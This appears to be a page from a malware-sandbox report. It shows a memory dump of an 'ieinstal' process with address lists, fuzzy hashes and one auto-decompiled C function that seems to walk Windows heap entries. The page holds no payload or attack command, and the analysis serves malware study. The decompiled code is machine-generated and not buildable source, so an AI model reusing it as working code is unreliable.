0x1f057fbe
0x1f057fc5
0x1f057fca
0x1f057fcd
0x1f057fd0
0x1f057fd4
0x1f05819c
0x1f05819e
0x1f0581a1
0x1f0581a4
0x1f0581a6
0x1f0581a9
0x1f0581ac
0x1f0581af
0x1f0581b2
0x1f0581b8
0x1f0581ba
0x1f058235
0x1f058240
0x1f058247
0x1f05828a
0x1f05828c
0x1f05828e
0x1f05849a
0x1f05849a
0x1f0584a0
0x1f0584a3
0x1f0584a5
0x1f0584ab
0x1f0584ab
0x1f0584b0
0x00000000
0x1f0584b0
0x1f058294
0x1f05829a
0x1f0582b7
0x1f0582bf
0x1f0582c1
0x1f0582c3
0x1f058482
0x1f058482
0x00000000
0x1f058482
0x1f0582c9
0x1f0582cd
0x1f0582cf
0x1f0582d1
0x1f0582d3
0x1f0582d3
0x1f0582e2
0x1f0582e7
0x1f0582e9
0x00000000
0x1f0582ef
0x1f0582f5
0x1f0582f7
0x1f058301
0x1f058304
0x1f058307
0x1f05830b
0x1f058410
0x1f058414
0x1f058423
0x1f05842e
0x1f058431
0x1f058437
0x1f058437
0x1f058437
0x1f05843b
0x1f05843b
0x1f05843e
0x1f05843e
0x1f058440
0x1f058442
0x1f058447
0x00000000
0x00000000
0x1f058449
0x1f05844f
0x1f058451
0x1f058459
0x1f05845e
0x1f05845e
0x1f05845e
0x1f058460
0x1f05847a
0x1f05847c
0x1f05847e
0x1f058480
0x1f058490
0x1f058498
0x1f058498
0x00000000
0x00000000
0x00000000
0x00000000
0x1f058480
0x1f058317
0x1f058319
0x1f058319
0x1f05831c
0x1f05831f
0x1f058322
0x1f058328
0x1f058328
0x1f05832a
0x00000000
0x00000000
0x1f058330
0x1f05833d
0x1f058342
0x1f058346
0x1f05834c
0x1f05834f
0x1f058351
0x1f05835d
0x1f058362
0x1f05836b
0x1f058371
0x1f058378
0x1f058378
0x1f05837a
0x1f0583c4
0x1f0583c4
0x1f0583c4
0x1f0583c4
0x1f0583c7
0x1f0583ca
0x1f0583cd
0x1f0583d3
0x00000000
0x1f0583d3
0x1f05837c
0x1f058382
0x1f058382
0x1f058388
0x00000000
0x00000000
0x1f05838a
0x1f05838d
0x1f058398
0x1f05839f
0x1f0583a4
0x1f0583aa
0x1f0583b0
0x1f0583b2
0x1f0583b4
0x1f0583b9
0x1f0583b9
0x1f0583b9
0x1f0583b2
0x1f0583bb
0x1f0583bd
0x1f0583bd
0x1f0583c1
0x00000000
0x1f0583d9
0x1f0583dc
0x1f0583dd
0x1f0583e4
0x1f0583e6
0x1f0583f0
0x1f0583f2
0x1f0583f8
0x1f0583f8
0x1f058401
0x1f058407
0x1f05840a
0x00000000
0x1f05840a
0x1f0582e9
0x1f0581c2
0x1f0581c2
0x1f0581c5
0x1f0581cb
0x1f0581d0
0x1f0581d6
0x1f0581f5
0x1f0581f9
0x1f0581fc
0x1f0581ff
0x1f058201
0x1f05820c
0x1f05820c
0x1f058210
0x1f058212
0x1f05821e
0x1f05821e
0x00000000
0x1f05821e
0x1f058214
0x1f058218
0x00000000
0x00000000
0x00000000
0x1f058218
0x1f058203
0x1f058206
0x00000000
0x00000000
0x00000000
0x1f058206
0x1f0581d8
0x1f0581da
0x1f0581dc
0x1f0581dc
0x1f0581e0
0x1f0581e2
0x1f0581e4
0x1f0581e4
0x1f0581e7
0x1f058221
0x1f058221
0x1f058225
0x1f058228
0x1f05822b
0x1f05822d
0x1f05822d
0x00000000
0x00000000
0x00000000
0x00000000
0x1f057fda
0x1f057fda
0x1f057fda
0x1f057fdc
0x1f057fdf
0x00000000
0x00000000
0x1f057fe1
0x1f057fe4
0x00000000
0x00000000
0x1f057fec
0x1f057ff3
0x1f057ff8
0x1f057ffa
0x1f058024
0x1f058027
0x1f05802a
0x1f05802a
0x1f05802d
0x1f05802f
0x1f0581ed
0x1f0581ed
0x1f058170
0x1f05817a
0x1f05817c
0x1f058182
0x1f058183
0x1f058189
0x1f058190
0x1f058192
0x00000000
0x00000000
0x1f058198
0x00000000
0x1f058198
0x1f058043
0x1f058043
0x1f058045
0x00000000
0x00000000
0x1f058056
0x1f05805a
0x1f058061
0x1f058067
0x1f05806a
0x1f05806d
0x1f058072
0x1f058079
0x1f05807f
0x1f058082
0x1f058084
0x1f05808b
0x1f05808f
0x1f058095
0x1f058097
0x1f05809b
0x1f0580a1
0x1f0580a7
0x1f0580ad
0x1f058161
0x1f058164
0x1f058167
0x00000000
0x00000000
0x1f05816d
0x00000000
0x1f05816d
0x1f0580b9
0x1f0580c2
0x1f0580c2
0x1f0580c5
0x1f0580c8
0x1f0580cb
0x1f0580d1
0x1f0580e1
0x1f0580e6
0x1f0580ec
0x1f0580ee
0x1f0580f5
0x1f0580fc
0x1f058104
0x1f05810f
0x1f058119
0x1f058124
0x1f058124
0x1f058124
0x1f058124
0x1f058130
0x1f058136
0x1f058137
0x1f05813d
0x1f058147
0x1f05814d
0x1f058153
0x1f058153
0x1f05815b
0x00000000
0x1f05815b
0x1f057ffc
0x1f057fff
0x00000000
0x00000000
0x1f058001
0x1f058004
0x00000000
0x00000000
0x1f058006
0x1f058009
0x00000000
0x00000000
0x1f058011
0x00000000
0x1f058011
0x1f058019
0x1f058019
0x00000000
0x1f058019
0x1f057ee0
0x1f057ee3
0x1f057ee6
0x1f057ee6
0x1f057ee8
0x1f057eeb
0x00000000
0x00000000
0x1f057ef1
0x1f057ef4
0x00000000
0x00000000
0x1f057f00
0x1f057f07
0x1f057f0c
0x1f057f0e
0x1f057f2d
0x1f057f30
0x1f057f33
0x1f057f37
0x1f057f44
0x1f057f46
0x1f057f49
0x1f057f4c
0x1f057f55
0x1f057f57
0x1f057f57
0x1f057f57
0x1f057f4e
0x1f057f4e
0x1f057f50
0x1f057f50
0x1f057f5d
0x1f057f62
0x1f057f6c
0x1f057f6e
0x1f057f71
0x1f057f74
0x1f057f76
0x1f057f7b
0x1f057f89
0x1f057f8b
0x1f057f8d
0x1f057f8e
0x1f057f91
0x1f057f9b
0x1f057f9f
0x1f057fa1
0x1f057fa4
0x1f057faa
0x1f057fb0
0x1f057fb2
0x00000000
0x00000000
0x00000000
0x00000000
0x1f057fb2
0x1f057f10
0x1f057f13
0x00000000
0x00000000
0x1f057f15
0x1f057f18
0x00000000
0x00000000
0x1f057f1a
0x1f057f1d
0x00000000
0x00000000
0x1f057f25
0x00000000
0x1f057f25
0x00000000
0x1f057e73
0x1f057e73
0x1f057e79
0x00000000
0x1f057e79
0x1f057e71
0x1f057e3b
0x1f057e3b
0x00000000
0x1f057e3b
0x1f057db7
0x1f057dbf
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 444be7f131685e6e90da39bfccd0b794fa2404371d1021f59b301750b2712fc5
Instruction ID: d659411d320e7ca8096123e6267259ced2afa173b28b502ed25b3e27d072b241
Opcode Fuzzy Hash: 444be7f131685e6e90da39bfccd0b794fa2404371d1021f59b301750b2712fc5
Instruction Fuzzy Hash: 0E424C75E002598FDB24CF69C881BEDB7F6BF48300F15819AE849AB251E774AD85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1F069C98 Relevance: .6, Instructions: 591
COMMONCrypto

Download Yara Rule

C-Code - Quality: 74%

			E1F069C98(signed int __ecx, signed int* __edx, char _a4) {
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t255;
				signed int _t257;
				signed int _t258;
				signed char _t259;
				signed int _t260;
				char* _t261;
				intOrPtr _t263;
				signed int _t267;
				signed char _t268;
				unsigned int _t269;
				signed int _t273;
				signed char _t277;
				signed short _t279;
				signed short _t284;
				signed char _t285;
				unsigned int _t286;
				signed short _t288;
				signed short _t290;
				signed char _t291;
				intOrPtr _t292;
				signed int _t293;
				signed char _t294;
				unsigned int _t298;
				intOrPtr* _t299;
				signed int _t300;
				unsigned int _t301;
				signed short _t302;
				signed short _t303;
				signed int _t306;
				signed short _t309;
				signed short _t321;
				signed char _t324;
				signed short _t325;
				signed int _t327;
				void* _t328;
				signed short _t332;
				signed int _t334;
				void* _t335;
				signed short _t339;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t354;
				signed short _t357;
				signed int _t364;
				signed int _t371;
				signed short _t372;
				intOrPtr* _t373;
				signed short _t376;
				signed char _t378;
				signed short _t379;
				signed short _t380;
				signed int _t385;
				signed int _t388;
				signed int _t395;
				signed char _t397;
				signed short _t400;
				signed int _t401;
				signed short _t402;
				signed short _t403;
				signed short _t404;
				signed short _t405;
				intOrPtr _t409;
				signed int _t410;
				signed char _t411;
				signed int _t412;
				unsigned int _t417;
				unsigned int _t425;
				signed int _t436;
				signed int _t437;
				signed char _t438;
				signed int _t440;
				intOrPtr _t444;
				signed int _t445;
				void* _t449;
				intOrPtr _t452;
				signed int _t454;
				void* _t455;
				signed short _t456;
				unsigned int _t457;
				intOrPtr _t458;
				intOrPtr* _t461;

				_t460 = __ecx;
				_t391 = __edx;
				if(( *(__ecx + 0x44) & 0x01000000) != 0) {
					_t461 =  *0x1f0b3764; // 0x0
					 *0x1f0b91e0(__ecx, __edx);
					return  *_t461();
				}
				__eflags =  *(__ecx + 0x40) & 0x61000000;
				asm("bt dword [esi+0x40], 0x1c");
				__eflags = (_t255 & 0xffffff00 | ( *(__ecx + 0x40) & 0x61000000) >= 0x00000000) & (__ecx & 0xffffff00 | __eflags != 0x00000000);
				if(__eflags == 0) {
					L5:
					_v12 = _v12 & 0x00000000;
					_t257 =  *_t391;
					_t394 = 2;
					__eflags = _t257;
					if(_t257 != 0) {
						_t436 = _t391[2] & 0x0000ffff;
						__eflags = _t436 & 0x00001002;
						if((_t436 & 0x00001002) == 0) {
							goto L25;
						}
						_t394 = _t436 & 0x00000002;
						__eflags = _t394;
						if(_t394 == 0) {
							L14:
							__eflags = _a4;
							if(_a4 == 0) {
								L17:
								_t457 = _t391[1] + _t257;
								__eflags = _t436 & 0x00001000;
								if((_t436 & 0x00001000) != 0) {
									_t27 = _t257 - 0x18; // -24
									_t394 = _t460;
									_t257 = E1F068214(_t460, _t27);
								}
								__eflags = _a4;
								if(_a4 == 0) {
									L21:
									_t452 =  *((intOrPtr*)(_t257 + 0x10));
									_t394 = 2;
									__eflags = _t452 - _t460 + 0xa4;
									if(_t452 == _t460 + 0xa4) {
										__eflags =  *((intOrPtr*)(_t460 + 0xea)) - _t394;
										if( *((intOrPtr*)(_t460 + 0xea)) != _t394) {
											goto L61;
										}
										_t445 =  *(_t460 + 0xe4);
										goto L62;
									}
									_t445 = _t452 + 0xfffffff0;
									goto L62;
								} else {
									__eflags = _t457 -  *((intOrPtr*)(_t257 + 0x28));
									if(_t457 <  *((intOrPtr*)(_t257 + 0x28))) {
										goto L81;
									}
									goto L21;
								}
							}
							__eflags = _t394;
							if(_t394 == 0) {
								goto L17;
							}
							_t457 =  *(_t257 + 0x24);
							goto L81;
						} else {
							__eflags =  *((char*)(_t460 + 0xea)) - 2;
							if( *((char*)(_t460 + 0xea)) != 2) {
								_t454 = 0;
								__eflags = 0;
							} else {
								_t454 =  *(_t460 + 0xe4);
							}
							__eflags = _t257 - _t454;
							if(_t257 == _t454) {
								goto L60;
							}
							_t436 = _t391[2] & 0x0000ffff;
							goto L14;
						}
					} else {
						_t445 = _t460;
						L62:
						_t457 = 0;
						__eflags = _t445;
						if(_t445 != 0) {
							__eflags =  *((intOrPtr*)(_t460 + 0xea)) - _t394;
							if( *((intOrPtr*)(_t460 + 0xea)) != _t394) {
								_t354 = 0;
								__eflags = 0;
							} else {
								_t354 =  *(_t460 + 0xe4);
							}
							__eflags = _t445 - _t354;
							if(_t445 == _t354) {
								E1F082527(_t460, _t391,  &_v12);
								goto L192;
							} else {
								 *_t391 = _t445;
								__eflags =  *(_t460 + 0x4c) - _t457;
								if( *(_t460 + 0x4c) == _t457) {
									_t357 =  *_t445 & 0x0000ffff;
								} else {
									_t372 =  *_t445;
									__eflags =  *(_t460 + 0x4c) & _t372;
									if(( *(_t460 + 0x4c) & _t372) != 0) {
										_t372 = _t372 ^  *(_t460 + 0x50);
										__eflags = _t372;
									}
									_t357 = _t372 & 0x0000ffff;
								}
								_t391[1] = (_t357 & 0x0000ffff) << 3;
								_t391[2] = _t394;
								_t391[2] = _t457;
								_t391[3] =  *((intOrPtr*)(_t445 + 0x20)) -  *(_t445 + 0x2c) << 0xc;
								_t364 =  *(_t445 + 0x2c) << 0xc;
								_t391[4] = _t364;
								__eflags =  *(_t445 + 0xc) & _t394;
								if(( *(_t445 + 0xc) & _t394) != 0) {
									_t371 = _t364 + 0x1000;
									__eflags = _t371;
									_t391[4] = _t371;
								}
								_t391[5] =  *((intOrPtr*)(_t445 + 0x24)) + (( !( *( *((intOrPtr*)(_t445 + 0x24)) + 2)) & 0x00000001) + 1) * 8;
								_t391[6] =  *(_t445 + 0x28);
								L81:
								__eflags = _t457;
								if(_t457 == 0) {
									goto L192;
								}
								_t268 =  *((intOrPtr*)(_t457 + 7));
								__eflags = _t268 & 0x00000040;
								if((_t268 & 0x00000040) == 0) {
									__eflags = _t268 - 4;
									if(_t268 != 4) {
										_t269 = _t457;
										L88:
										 *_t391 = _t269 + 8;
										_t438 = 2;
										_t391[2] = 1;
										__eflags =  *((intOrPtr*)(_t460 + 0xea)) - _t438;
										if( *((intOrPtr*)(_t460 + 0xea)) != _t438) {
											_t273 = 0;
											__eflags = 0;
										} else {
											_t273 =  *(_t460 + 0xe4);
										}
										__eflags = _t273;
										if(_t273 == 0) {
											L96:
											_t277 =  *(_t460 + 0x4c) >> 0x00000014 &  *(_t460 + 0x52) ^  *(_t457 + 2);
											__eflags = _t277 & 0x00000001;
											if((_t277 & 0x00000001) == 0) {
												 *_t391 = _t457 + 0x10;
												__eflags =  *(_t460 + 0x4c);
												if( *(_t460 + 0x4c) == 0) {
													_t279 =  *_t457 & 0x0000ffff;
												} else {
													_t284 =  *_t457;
													__eflags =  *(_t460 + 0x4c) & _t284;
													if(( *(_t460 + 0x4c) & _t284) != 0) {
														_t284 = _t284 ^  *(_t460 + 0x50);
														__eflags = _t284;
													}
													_t279 = _t284 & 0x0000ffff;
												}
												_t391[1] = (_t279 & 0x0000ffff) * 8 - 0x10;
												_t391[2] =  *(_t457 + 6);
												_t391[2] = 0;
												_t391[2] = 0x10;
												_t391[5] = 0x10;
												goto L192;
											}
											_t285 =  *((intOrPtr*)(_t457 + 7));
											__eflags = _t285 & 0x00000040;
											if((_t285 & 0x00000040) == 0) {
												__eflags = _t285 - 4;
												if(_t285 != 4) {
													_t286 = _t457;
													L103:
													 *_t391 = _t286 + 8;
													_t397 =  *((intOrPtr*)(_t457 + 7));
													__eflags = _t397 - 4;
													if(_t397 == 4) {
														__eflags =  *(_t460 + 0x4c);
														if( *(_t460 + 0x4c) == 0) {
															_t288 =  *_t457 & 0x0000ffff;
														} else {
															_t303 =  *_t457;
															__eflags =  *(_t460 + 0x4c) & _t303;
															if(( *(_t460 + 0x4c) & _t303) != 0) {
																_t303 = _t303 ^  *(_t460 + 0x50);
																__eflags = _t303;
															}
															_t288 = _t303 & 0x0000ffff;
														}
														_t391[2] = 0x40;
														_t290 = 0x4001;
														_t391[1] =  *((intOrPtr*)(_t457 - 8)) - (_t288 & 0x0000ffff);
														_t391[2] = 0x4001;
														__eflags =  *(_t460 + 0x4c);
														if( *(_t460 + 0x4c) == 0) {
															_t400 =  *_t457 & 0x0000ffff;
														} else {
															_t302 =  *_t457;
															__eflags =  *(_t460 + 0x4c) & _t302;
															if(( *(_t460 + 0x4c) & _t302) != 0) {
																_t302 = _t302 ^  *(_t460 + 0x50);
																__eflags = _t302;
															}
															_t400 = _t302 & 0x0000ffff;
															_t290 = _t391[2] & 0x0000ffff;
														}
														_t401 = _t400 & 0x0000ffff;
														_t391[2] = _t401;
														__eflags = _t438 & _t290;
														if((_t438 & _t290) == 0) {
															_t391[5] = _t401;
														}
														_t402 = _t290 & 0x0000ffff;
														L165:
														__eflags =  *(_t460 + 0x4c);
														if( *(_t460 + 0x4c) == 0) {
															_t291 =  *(_t457 + 2);
															_t403 = _t402 & 0x0000ffff;
														} else {
															_t301 =  *_t457;
															__eflags =  *(_t460 + 0x4c) & _t301;
															if(( *(_t460 + 0x4c) & _t301) != 0) {
																_t301 = _t301 ^  *(_t460 + 0x50);
																__eflags = _t301;
															}
															_t403 = _t391[2] & 0x0000ffff;
															_t291 = _t301 >> 0x10;
														}
														__eflags = _t438 & _t291;
														if((_t438 & _t291) == 0) {
															_t292 =  *[fs:0x30];
															_t404 = _t403 & 0x0000ffff;
															__eflags =  *(_t292 + 0x68) & 0x00000800;
															if(( *(_t292 + 0x68) & 0x00000800) != 0) {
																_t293 =  *(_t457 + 3) & 0x000000ff;
															} else {
																_t293 = 0;
															}
															_t391[4] = _t293;
														} else {
															_t299 = E1F068167(_t460, _t457);
															_t391[3] =  *(_t299 + 4);
															_t391[4] =  *_t299;
															_t409 =  *[fs:0x30];
															__eflags =  *(_t409 + 0x68) & 0x00000800;
															if(( *(_t409 + 0x68) & 0x00000800) != 0) {
																_t300 =  *(_t299 + 2) & 0x0000ffff;
															} else {
																_t300 = 0;
															}
															_t391[4] = _t300;
															_t391[2] = _t391[2] | 0x00000010;
															_t404 = _t391[2] & 0x0000ffff;
														}
														__eflags =  *(_t460 + 0x4c);
														if( *(_t460 + 0x4c) == 0) {
															_t294 =  *(_t457 + 2);
															_t405 = _t404 & 0x0000ffff;
														} else {
															_t298 =  *_t457;
															__eflags =  *(_t460 + 0x4c) & _t298;
															if(( *(_t460 + 0x4c) & _t298) != 0) {
																_t298 = _t298 ^  *(_t460 + 0x50);
																__eflags = _t298;
															}
															_t405 = _t391[2] & 0x0000ffff;
															_t294 = _t298 >> 0x10;
														}
														_t391[2] = _t294 & 0xe0 | _t405;
														goto L192;
													}
													__eflags = _t397 - 3;
													if(_t397 == 3) {
														_t402 = 0x1000;
														 *_t391 =  *(_t457 + 0x18);
														_t391[5] = _t391[5] & 0x00000000;
														_t391[1] =  *(_t457 + 0x1c);
														_t391[2] = 0x10000000;
														goto L165;
													}
													__eflags = _t397 - 1;
													if(_t397 != 1) {
														_t440 =  *(_t460 + 0x4c);
														__eflags = _t440;
														if(_t440 == 0) {
															_t306 =  *_t457 & 0x0000ffff;
														} else {
															_t339 =  *_t457;
															_t440 =  *(_t460 + 0x4c);
															__eflags = _t339 & _t440;
															if((_t339 & _t440) != 0) {
																_t339 = _t339 ^  *(_t460 + 0x50);
																__eflags = _t339;
															}
															_t397 =  *((intOrPtr*)(_t457 + 7));
															_t306 = _t339 & 0x0000ffff;
														}
														_v16 = _t306;
														__eflags = _t397 - 5;
														if(_t397 != 5) {
															__eflags = _t397 & 0x00000040;
															if((_t397 & 0x00000040) == 0) {
																__eflags = (_t397 & 0x0000003f) - 0x3f;
																if((_t397 & 0x0000003f) == 0x3f) {
																	__eflags = _t397;
																	if(_t397 >= 0) {
																		__eflags = _t440;
																		if(_t440 == 0) {
																			_t309 =  *_t457 & 0x0000ffff;
																		} else {
																			_t332 =  *_t457;
																			__eflags =  *(_t460 + 0x4c) & _t332;
																			if(( *(_t460 + 0x4c) & _t332) != 0) {
																				_t332 = _t332 ^  *(_t460 + 0x50);
																				__eflags = _t332;
																			}
																			_t309 = _t332 & 0x0000ffff;
																		}
																	} else {
																		_t425 = _t457 >> 0x00000003 ^  *_t457 ^  *0x1f0b6964 ^ _t460;
																		__eflags = _t425;
																		if(_t425 == 0) {
																			_t334 = _t457 - (_t425 >> 0xd);
																			__eflags = _t334;
																			_t335 =  *_t334;
																		} else {
																			_t335 = 0;
																		}
																		_t309 =  *((intOrPtr*)(_t335 + 0x14));
																	}
																	_t410 =  *(_t457 + (_t309 & 0xffff) * 8 - 4);
																} else {
																	_t410 = _t397 & 0x3f;
																}
															} else {
																_t410 =  *(_t457 + 4 + (_t397 & 0x3f) * 8) & 0x0000ffff;
															}
														} else {
															_t410 =  *(_t460 + 0x54) & 0x0000ffff ^  *(_t457 + 4) & 0x0000ffff;
														}
														_t391[1] = ((_v16 & 0x0000ffff) << 3) - _t410;
														_t391[2] =  *(_t457 + 6);
														_t391[2] = 1;
														_t411 =  *((intOrPtr*)(_t457 + 7));
														__eflags = _t411 - 5;
														if(_t411 != 5) {
															__eflags = _t411 & 0x00000040;
															if((_t411 & 0x00000040) == 0) {
																__eflags = (_t411 & 0x0000003f) - 0x3f;
																if((_t411 & 0x0000003f) == 0x3f) {
																	__eflags = _t411;
																	if(_t411 >= 0) {
																		__eflags =  *(_t460 + 0x4c);
																		if( *(_t460 + 0x4c) == 0) {
																			_t321 =  *_t457 & 0x0000ffff;
																		} else {
																			_t325 =  *_t457;
																			__eflags =  *(_t460 + 0x4c) & _t325;
																			if(( *(_t460 + 0x4c) & _t325) != 0) {
																				_t325 = _t325 ^  *(_t460 + 0x50);
																				__eflags = _t325;
																			}
																			_t321 = _t325 & 0x0000ffff;
																		}
																	} else {
																		_t417 = _t457 >> 0x00000003 ^  *_t457 ^  *0x1f0b6964 ^ _t460;
																		__eflags = _t417;
																		if(_t417 == 0) {
																			_t327 = _t457 - (_t417 >> 0xd);
																			__eflags = _t327;
																			_t328 =  *_t327;
																		} else {
																			_t328 = 0;
																		}
																		_t321 =  *((intOrPtr*)(_t328 + 0x14));
																	}
																	_t412 =  *(_t457 + (_t321 & 0xffff) * 8 - 4);
																} else {
																	_t412 = _t411 & 0x3f;
																}
															} else {
																_t412 =  *(_t457 + 4 + (_t411 & 0x3f) * 8) & 0x0000ffff;
															}
														} else {
															_t412 =  *(_t460 + 0x54) & 0x0000ffff ^  *(_t457 + 4) & 0x0000ffff;
														}
														_t324 = _t391[2] & 0x0000ffff;
														_t438 = 2;
														_t391[2] = _t412;
														__eflags = _t438 & _t324;
														if((_t438 & _t324) == 0) {
															_t391[5] = _t412;
														}
														_t402 = _t324;
														goto L165;
													}
													_t391[2] = 1;
													goto L94;
												}
												_t342 =  *(_t457 + 6) & 0x000000ff;
												L99:
												_t286 = _t457 + _t342 * 8;
												goto L103;
											}
											_t342 = _t285 & 0x3f;
											__eflags = _t342;
											goto L99;
										} else {
											_t344 = E1F081FC6(_t460, _t391, _t394);
											__eflags = _t344;
											if(_t344 == 0) {
												_t438 = 2;
												goto L96;
											}
											__eflags = _t391[2] & 0x00002000;
											if((_t391[2] & 0x00002000) == 0) {
												goto L192;
											}
											L94:
											_t394 = 2;
											L25:
											__eflags =  *((intOrPtr*)(_t460 + 0xea)) - _t394;
											if( *((intOrPtr*)(_t460 + 0xea)) != _t394) {
												_t258 = 0;
												__eflags = 0;
											} else {
												_t258 =  *(_t460 + 0xe4);
											}
											__eflags = _t258;
											if(_t258 == 0) {
												L31:
												__eflags = _t391[2] & 0x00000001;
												_t395 =  *_t391;
												if((_t391[2] & 0x00000001) == 0) {
													_t394 = _t395 + 0xfffffff0;
													__eflags =  *(_t460 + 0x4c);
													if( *(_t460 + 0x4c) == 0) {
														_t456 =  *_t394 & 0x0000ffff;
													} else {
														_t376 =  *_t394;
														__eflags =  *(_t460 + 0x4c) & _t376;
														if(( *(_t460 + 0x4c) & _t376) != 0) {
															_t376 = _t376 ^  *(_t460 + 0x50);
															__eflags = _t376;
														}
														_t456 = _t376 & 0x0000ffff;
													}
													_t259 =  *(_t394 + 6);
													__eflags = _t259;
													if(_t259 == 0) {
														_t437 = _t460;
													} else {
														_t437 = (_t394 & 0xffff0000) - ((_t259 & 0x000000ff) << 0x10) + 0x10000;
													}
													__eflags = _t437;
													if(_t437 == 0) {
														L191:
														_v12 = 0xc0000141;
														goto L192;
													} else {
														__eflags =  *((char*)(_t394 + 7)) - 3;
														if( *((char*)(_t394 + 7)) != 3) {
															_t267 = _t456 & 0x0000ffff;
															L80:
															_t457 = _t394 + _t267 * 8;
															goto L81;
														}
														L57:
														__eflags =  *(_t394 + 0x1c) + 0x20 + _t394 -  *((intOrPtr*)(_t437 + 0x28));
														if( *(_t394 + 0x1c) + 0x20 + _t394 <  *((intOrPtr*)(_t437 + 0x28))) {
															 *_t391 =  *(_t394 + 0x18);
															_t391[5] = _t391[5] & 0x00000000;
															_t457 = 0;
															_t391[1] =  *(_t394 + 0x1c);
															_t391[2] = 0x10000000;
															goto L81;
														}
														_t444 =  *((intOrPtr*)(_t437 + 0x10));
														__eflags = _t444 - _t460 + 0xa4;
														if(_t444 == _t460 + 0xa4) {
															L60:
															_t394 = 2;
															L61:
															_t445 = 0;
															__eflags = 0;
															goto L62;
														}
														_t445 = _t444 + 0xfffffff0;
														_t394 = 2;
														goto L62;
													}
												}
												_t394 = _t395 + 0xfffffff8;
												__eflags =  *((char*)(_t394 + 7)) - 5;
												if( *((char*)(_t394 + 7)) == 5) {
													_t394 = _t394 - (( *(_t394 + 6) & 0x000000ff) << 3);
													__eflags = _t394;
												}
												__eflags =  *((intOrPtr*)(_t394 + 7)) - 4;
												if( *((intOrPtr*)(_t394 + 7)) != 4) {
													_t378 =  *(_t394 + 6);
													__eflags = _t378;
													if(_t378 == 0) {
														_t437 = _t460;
													} else {
														_t449 = (_t394 & 0xffff0000) - ((_t378 & 0x000000ff) << 0x10);
														_t378 =  *((intOrPtr*)(_t394 + 7));
														_t437 = _t449 + 0x10000;
													}
													__eflags = _t437;
													if(_t437 == 0) {
														goto L191;
													} else {
														__eflags = _t378 - 3;
														if(_t378 == 3) {
															goto L57;
														}
														__eflags =  *(_t460 + 0x4c);
														if( *(_t460 + 0x4c) == 0) {
															_t379 =  *_t394 & 0x0000ffff;
														} else {
															_t380 =  *_t394;
															__eflags =  *(_t460 + 0x4c) & _t380;
															if(( *(_t460 + 0x4c) & _t380) != 0) {
																_t380 = _t380 ^  *(_t460 + 0x50);
																__eflags = _t380;
															}
															_t379 = _t380 & 0x0000ffff;
														}
														_t267 = _t379 & 0x0000ffff;
														goto L80;
													}
												} else {
													_t458 =  *((intOrPtr*)(_t394 - 0x18));
													_t373 = _t460 + 0x9c;
													L64:
													__eflags = _t458 - _t373;
													if(_t458 == _t373) {
														_v12 = 0x8000001a;
														goto L192;
													}
													_t457 = _t458 + 0x18;
													goto L81;
												}
											} else {
												_t385 = E1F081FC6(_t460, _t391, _t394);
												__eflags = _t385;
												if(_t385 == 0) {
													goto L31;
												}
												__eflags = _t391[2] & 0x00002000;
												if((_t391[2] & 0x00002000) == 0) {
													goto L192;
												}
												goto L31;
											}
										}
									}
									_t346 =  *(_t457 + 6) & 0x000000ff;
									L84:
									_t269 = _t457 + _t346 * 8;
									goto L88;
								}
								_t346 = _t268 & 0x3f;
								__eflags = _t346;
								goto L84;
							}
						}
						_t373 = _t460 + 0x9c;
						_t458 =  *_t373;
						goto L64;
					}
				} else {
					_t388 = E1F0706C6(__edx, __ecx, _t455, __ecx, __eflags);
					__eflags = _t388;
					if(_t388 != 0) {
						goto L5;
					} else {
						_v12 = 0xc000000d;
						L192:
						_t260 = E1EFD3C40();
						__eflags = _t260;
						if(_t260 == 0) {
							_t261 = 0x7ffe0380;
						} else {
							_t261 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						__eflags =  *_t261;
						if( *_t261 != 0) {
							_t263 =  *[fs:0x30];
							__eflags =  *(_t263 + 0x240) & 0x00000001;
							if(( *(_t263 + 0x240) & 0x00000001) != 0) {
								__eflags = _v12 - 0x8000001a;
								if(_v12 != 0x8000001a) {
									E1F07F7CF(_t460);
								}
							}
						}
						return _v12;
					}
				}
			}

0x1f069ca2
0x1f069ca4
0x1f069cae
0x1f069cb2
0x1f069cba
0x00000000
0x1f069cc0
0x1f069cc7
0x1f069cd1
0x1f069cd9
0x1f069cdb
0x1f069cf4
0x1f069cf4
0x1f069cf8
0x1f069cfc
0x1f069cfd
0x1f069cff
0x1f069d08
0x1f069d0c
0x1f069d12
0x00000000
0x00000000
0x1f069d1a
0x1f069d1a
0x1f069d1d
0x1f069d3e
0x1f069d3e
0x1f069d42
0x1f069d51
0x1f069d54
0x1f069d56
0x1f069d5c
0x1f069d5e
0x1f069d61
0x1f069d63
0x1f069d63
0x1f069d68
0x1f069d6c
0x1f069d77
0x1f069d77
0x1f069d82
0x1f069d83
0x1f069d85
0x1f069d8f
0x1f069d95
0x00000000
0x00000000
0x1f069d9b
0x00000000
0x1f069d9b
0x1f069d87
0x00000000
0x1f069d6e
0x1f069d6e
0x1f069d71
0x00000000
0x00000000
0x00000000
0x1f069d71
0x1f069d6c
0x1f069d44
0x1f069d47
0x00000000
0x00000000
0x1f069d49
0x00000000
0x1f069d1f
0x1f069d1f
0x1f069d26
0x1f069d30
0x1f069d30
0x1f069d28
0x1f069d28
0x1f069d28
0x1f069d32
0x1f069d34
0x00000000
0x00000000
0x1f069d3a
0x00000000
0x1f069d3a
0x1f069d01
0x1f069d01
0x1f069ed3
0x1f069ed3
0x1f069ed5
0x1f069ed7
0x1f069ef1
0x1f069ef7
0x1f069f01
0x1f069f01
0x1f069ef9
0x1f069ef9
0x1f069ef9
0x1f069f03
0x1f069f05
0x1f06a072
0x00000000
0x1f069f0b
0x1f069f0b
0x1f069f0d
0x1f069f10
0x1f069f21
0x1f069f12
0x1f069f12
0x1f069f14
0x1f069f17
0x1f069f19
0x1f069f19
0x1f069f19
0x1f069f1c
0x1f069f1c
0x1f069f2a
0x1f069f2d
0x1f069f31
0x1f069f3e
